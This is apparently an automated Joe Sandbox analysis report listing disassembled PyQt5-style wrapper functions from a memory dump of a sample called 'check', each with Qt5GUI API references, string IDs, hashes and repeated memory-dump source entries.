                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?frameGeometry@Rect@@Window@@malloc
                                                                                                                                                                                                                                          • String ID: QWindow$frameGeometry$frameGeometry(self) -> QRect
                                                                                                                                                                                                                                          • API String ID: 2394784811-2715355677
                                                                                                                                                                                                                                          • Opcode ID: 67390fa3928531d50e846b8c7bbf8db5b037ee6ced8fa7f0c95f33534833ec68
                                                                                                                                                                                                                                          • Instruction ID: e1fbaae0c9a032cec521b29f5bf84f5d1e688e7cfcfc762b1a72be99485ecb2b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67390fa3928531d50e846b8c7bbf8db5b037ee6ced8fa7f0c95f33534833ec68
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C110577A09A4681EB109F65E8896A933A4FB44FD0F918032DA9E07320EF7DF599C744
                                                                                                                                                                                                                                          Function 00007FF89D99E0C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?size@QStaticText@@QEBA?AVQSizeF@@XZ.QT5GUI ref: 00007FF89D99E118
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?size@SizeStaticText@@malloc
                                                                                                                                                                                                                                          • String ID: QStaticText$size$size(self) -> QSizeF
                                                                                                                                                                                                                                          • API String ID: 4108446641-3401004608
                                                                                                                                                                                                                                          • Opcode ID: 76467196cafda7bc2e80d266c26c5692d51bd2237cc11284da58accd816c089c
                                                                                                                                                                                                                                          • Instruction ID: a03ad60188fff573e4315c9f432494632b3b23b75555b770cd296d3200872e9d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76467196cafda7bc2e80d266c26c5692d51bd2237cc11284da58accd816c089c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0110977A09A4685EB10DF61E84A6A933A5FB44FD0F918032C98E07320EF7DE559D744
                                                                                                                                                                                                                                          Function 00007FF89D99E010 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?previous@QTextBlock@@QEBA?AV1@XZ.QT5GUI ref: 00007FF89D99E068
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?previous@Block@@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextBlock$previous$previous(self) -> QTextBlock
                                                                                                                                                                                                                                          • API String ID: 2126126676-4171310763
                                                                                                                                                                                                                                          • Opcode ID: 1f5047df8e7db3ac91c1337c0b3e796959bb8cc9928506f5b36508a3024e45c4
                                                                                                                                                                                                                                          • Instruction ID: 0cac6b741bba89eee56c63a9d49a8fbc388d52ed527df9759898ef8bcf44505d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f5047df8e7db3ac91c1337c0b3e796959bb8cc9928506f5b36508a3024e45c4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78110977A09A4695EB109F61E8496A933A5FB44FD4F918032C98E07320EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D9C0060 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?rectPoints@QPageSize@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FF89D9C00B8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?rectPagePoints@Rect@@Size@@malloc
                                                                                                                                                                                                                                          • String ID: QPageSize$rectPoints$rectPoints(self) -> QRect
                                                                                                                                                                                                                                          • API String ID: 778997778-2166890302
                                                                                                                                                                                                                                          • Opcode ID: 82be4533acec4891f07a846e5503e8a2f096e0abdbc94527be644c5030deb480
                                                                                                                                                                                                                                          • Instruction ID: 5df727c74d356614e954eb54e34e11bda0419f98f03c10a21ce53dcd8ef5ff6d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82be4533acec4891f07a846e5503e8a2f096e0abdbc94527be644c5030deb480
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45112337A08A4A85EB10DF21E8496A933A4FB44FD0F918032CA9E07320EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D992050 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?toolTip@QTextCharFormat@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FF89D9920A8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?toolCharFormat@@String@@TextTip@malloc
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$toolTip$toolTip(self) -> str
                                                                                                                                                                                                                                          • API String ID: 2373747465-1020150115
                                                                                                                                                                                                                                          • Opcode ID: 09147ff8525dca628f3aabfe1351473e2b3c2af9bd377b84426219ce61898191
                                                                                                                                                                                                                                          • Instruction ID: 9e0fe7c518952f34a7ef205fea1a226bc87d79d3dcb73bd85aba5e7a131dc258
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09147ff8525dca628f3aabfe1351473e2b3c2af9bd377b84426219ce61898191
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A811F777A08A4681EB10DB65E84A6A923A5FB44FD0F918032C99E07320EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D9A8050 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?textAlignment@QStandardItem@@QEBA?AV?$QFlags@W4AlignmentFlag@Qt@@@@XZ.QT5GUI ref: 00007FF89D9A80A8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?textAlignmentAlignment@Flag@Flags@Item@@Qt@@@@Standardmalloc
                                                                                                                                                                                                                                          • String ID: QStandardItem$textAlignment$textAlignment(self) -> Qt.Alignment
                                                                                                                                                                                                                                          • API String ID: 333683570-2463140100
                                                                                                                                                                                                                                          • Opcode ID: 4ece0d1aafe4df7e469a038808dc6a8d8a0e6b9f37815f15312fe9a654044874
                                                                                                                                                                                                                                          • Instruction ID: 02ee66edc42a3c4613e152c0bea4b3934bc682607fabda5cbdb40735eb721ba5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ece0d1aafe4df7e469a038808dc6a8d8a0e6b9f37815f15312fe9a654044874
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51110977A08A4686EB109F65E84A6A933A4FB44FD0F918032CA8E07320EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D96E050 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?serialNumber@QScreen@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FF89D96E0A8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?serialNumber@Screen@@String@@malloc
                                                                                                                                                                                                                                          • String ID: QScreen$serialNumber$serialNumber(self) -> str
                                                                                                                                                                                                                                          • API String ID: 685519441-386738514
                                                                                                                                                                                                                                          • Opcode ID: d90530b9e19b7316ac076db9ff9334b6ac98a3b2911d04554cfea8242d9ceb78
                                                                                                                                                                                                                                          • Instruction ID: ec97759f31bd363a7df94029a86990acef4a6ad6e8853b4265dac421dd97e62b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d90530b9e19b7316ac076db9ff9334b6ac98a3b2911d04554cfea8242d9ceb78
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15112737A08A4681EB109F25E8496A933A5FB44FD0F918032D99E07320EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D967FA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?availableGeometry@QScreen@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FF89D967FF8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
